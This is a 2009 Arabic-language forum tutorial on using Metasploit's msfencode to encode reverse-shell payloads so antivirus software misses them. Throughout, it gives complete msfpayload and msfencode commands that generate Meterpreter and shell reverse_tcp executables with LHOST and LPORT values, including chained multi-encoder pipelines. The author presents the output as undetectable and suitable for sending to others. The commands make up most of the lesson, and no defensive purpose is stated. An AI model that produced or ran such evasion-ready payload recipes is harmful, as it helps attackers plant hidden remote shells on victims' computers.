عرض مشاركة واحدة
قديم 12-03-2009, 11:04 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي الدرس التاسع : تشفير البايلود بالميتاسبلويت msfencode


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
كيف صحتكم واوالكم وظروفك
ان شاء الله رب العالمين تكونو بألف خير وصحة وسلامة وعافية
اليوم درسنا يتكلم عن التشفير بالميتاسبلويت
لنفرض انك انشأت بايلود بالـ msfpayload وفحصته او ارسلته لأحد اظن انه رح ينكشف من برنامج الحماية
لكن درسنا اليوم رح يتم تشفير البايلود نهائي من اي حمايات
نبدأ اول شيء
نذهب لل CMD SHELL

نكتب امر

كود PHP:
ruby msfencode -
اظهار تعليمات حول الادرة
كود PHP:
ruby msfencode -
يظهر انواع التشفيرات المتوفرة وقوت كل واحد
واقوى واحدة وهي شيكاتا
كود PHP:
x86/shikata_ga_nai 
الآن نأتي لتعريف الاوامر لها والمهمة والرئيسية
-e نوع التشفير يتبعها الاسم كـ
كود PHP:
-e x86/shikata_ga_nai 
-t صيغة التشفير يتبعها الصيغة
والمتوافرة في الاداة هي 6 وهي
raw, ruby, perl, c,exe, vba
يكون الامر كـ
كود PHP:
 -t perl 
-i لأستيراد بايلود صنعتة سابقا وتريد تشفيرة الآن
يكون الامر هكذا
كود PHP:
-i C:\server.exe 
او باللينكس يكون الامر متبوع بالاسم مباشرة هكذا
كود PHP:
-i server.exe 
او حسب المسار باللينكس
الان عند التشفير يجب وضع -o لأخراج الملف للخارج اذا لم تريد ان يطبعه على شكل كود برمجي وفي وندوز سواء وضعته ام لا لن يفعل شيء
لانك بآخر الكود رح تضع
كود PHP:
 >"C:\"service.exe 
ويفضل وضعه

لم نتطرق الى جميع الاوامر لكن في المستقبل القريب
في الوقت هذه اللي تهمنا فقط ... باقي 5 اوامر غير مهمة كثيرا
الآن نأتي للعملي
نعرف في العادة ان صناعة اي بايلود يكون هكذا
كود PHP:
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 X >"C:\"server.exe 
الآن هذا الامر واضح يقوم بصناعة بايلود لكن اذا ذهب وفحصته بأي موقع فحص او حماية جهازك ترى انه مكشوف
الآن هو في المسار C:\
الآن لنقم بتشفيره بالأمر
كود PHP:
ruby msfencode -e x86/shikata_ga_nai -i C:\server.exe -t exe ->"C:\"encoded.exe 
لنوضح الاوامر بدقة
كود PHP:
ruby msfencode 
لأستخدام الاداة (التشفير)
كود PHP:
-e x86/shikata_ga_nai 
وكما ذكرت لأستخدام النوع الذي تريد التشفير به اونا اخترت شيكاتا وهو اقوى واحد مشفر من جميع الحمايات عدى اثنين او ثلاثة وهي AVG و avast والثالث لم اذكر اسمه
كود PHP:
-i C:\server.exe 
وايضا كما ذكرت لتشفير ملف تم انشائه سابقا متبوعا بالمسار واذا كان بداخل المجلد كما في اللنكس نضع فقط الاسم
كود PHP:
-t exe 
وايضا كما ذكرت سابقا لأختيار الصيغة وهنا صيغة exe ملف تنفيذي
كود PHP:
-
لاخراجة للخارج وعدم طباعته على الشاشة

لنفرض انك تريد الشل بلغة بيرل او سي اي مطبوع على شاشة الدوس
كود PHP:
ruby msfencode -i C:\server.exe -t c test.exe 
وسترى انه طبعه على شاشة الدوس بتشفير شيكاتا
ييجي واحد ويقول ليش ما اخترنا نوع التشفير
اقوله لأن الاداة تختار التشفير شيكاتا تلقائي
الآن نقدر نسوي كل هذا من صنع بايلود وتشفيره على سطر واحد ونسمي الملف بالأخر
انظروا كيف..
كود PHP:
ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.137 LPORT=4444 X ruby msfencode -e x86/shikata_ga_nai -t exe >"C:\"finish.exe 
اول امر وهو صناعة بايلود لكن دون وضع اسم ومكان الحفظ فقط وضعنا الصيغة exe اختصار لـ X وفصلناه مع الأمر الآخر برمز | ثم كتبنا الامر التالي وهو واضح اختيار التشفير شيكاتا والصيغة ومكان الحفظ

ويوجد ايضا التشفير بأكثر من نوع
كود PHP:
ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.15 LPORT=4444 ruby msfencode -e x86/shikata_ga_nai -t raw -c 5 ruby msfencode -e cmd/generic_sh -t raw -c 5 ruby msfencode -e x86/countdown -t perl >"C:\"3encoders.exe 
كل شيء واضح عدا -t raw -c 5 اي انه يجمع الصيغة وبالىخر يتم اختيارها
الآن افحص الملف وستجده انه غير مكشوف من اي حماية
هذا هو درسنا
وان شاء الله استفدتوا
واللي مو فاهم يقول لي وانا بالخدمة
ولشباب اللينكس فقط التغييرات بسيطة مجرد من ruby الى ./ و المسار C الى اسم فقط او مسار تفضله وبأمكانك وضع اسم الملف فقط وستجده داخل مجلد اداة الميتاسبلويت
مع تحياتي
لا للاحتكار
المجهوول


hg]vs hgjhsu : jatdv hgfhdg,] fhgldjhsfg,dj msfencode


التعديل الأخير تم بواسطة المجهووول ; 12-06-2009 الساعة 10:58 PM.

   

رد مع اقتباس